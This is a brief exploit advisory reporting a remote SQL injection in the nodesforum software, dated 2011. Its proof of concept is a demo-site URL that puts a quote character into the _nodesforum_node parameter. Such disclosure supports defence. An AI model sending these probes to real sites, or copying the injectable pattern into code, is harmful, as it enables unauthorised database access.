nodesforum suffers from a remote SQL injection vulnerability.
7692b4a2838a94061abee35f2e2405e50c16520117444413270104decd2ccf2f
# Exploit Title: nodesforum Sql Injection
# Link Software: http://home.nodesforum.com/demo
# Date: 6/23/2011
# Author: Andrea Bocchetti
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerable Code in _nodesforum_node
PoC: http://home.nodesforum.com/demo?_nodesforum_node=u1' <- sql injection